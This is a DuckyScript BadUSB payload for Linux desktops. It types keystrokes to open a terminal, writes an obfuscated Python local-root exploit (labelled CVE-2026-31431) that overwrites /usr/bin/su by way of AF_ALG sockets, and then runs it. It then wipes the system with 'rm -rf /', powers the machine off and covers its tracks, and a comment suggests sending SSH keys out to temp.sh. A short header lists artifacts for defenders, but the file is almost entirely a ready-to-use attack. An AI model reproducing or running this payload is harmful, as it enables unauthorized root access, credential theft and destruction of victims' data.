REM This is a BadUSB demo script for Linux/GNOME
REM #############################
REM ####### DANGER !! ###########
REM #############################
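REM This script wipes a Linux machine that is not patched against CVE-2026-31431.
REM It opens a terminal from the GUI (two methods are tried), runs the exploit, and then wipes the root filesystem with rm -rf.
REM Observable artifacts for defenders: a newly attached USB HID keyboard, the file /tmp/cve.py, and a python3 process opening an AF_ALG socket (address family 38) before su is run.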

REM Open a terminal through the GUI launcher (KDE Plasma, GNOME)
DELAY 500
GUI
STRING terminal
ENTER
DELAY 500

REM Open a terminal through the Ctrl+Alt+T hotkey
DELAY 500
CTRL-ALT T
DELAY 200
ENTER
ENTER

REM Clear the screen in case some banner was displayed
STRING clear
ENTER

REM Write the Python proof-of-concept to /tmp/cve.py with a shell here-document
STRING cat > /tmp/cve.py << EOF
ENTER

STRING #!/usr/bin/env python3
ENTER
STRING import os as g,zlib,socket as s
ENTER
STRING def d(x):return bytes.fromhex(x)
ENTER
STRING def c(f,t,c):
ENTER
STRING  a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
ENTER
STRING  try:u.recv(8+t)
ENTER
STRING  except:0
ENTER
STRING f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
ENTER
STRING while i<len(e):c(f,i,e[i:i+4]);i+=4
ENTER
STRING g.system("su")
ENTER
ENTER
STRING EOF
ENTER

REM Run exploit command
STRING python3 /tmp/cve.py
ENTER
DELAY 200

REM add any other exploits here whilst your root, dump ssh keys via https://temp.sh/ 
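REM clean up after (the command below is the destructive step: it recursively deletes / and then powers the machine off)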

STRING rm -rf / && poweroff > /dev/null 2>&1 &
ENTER

REM detach from the process and close terminal to hide
DELAY 200
STRING disown
ENTER
DELAY 200
STRING exit
ENTER
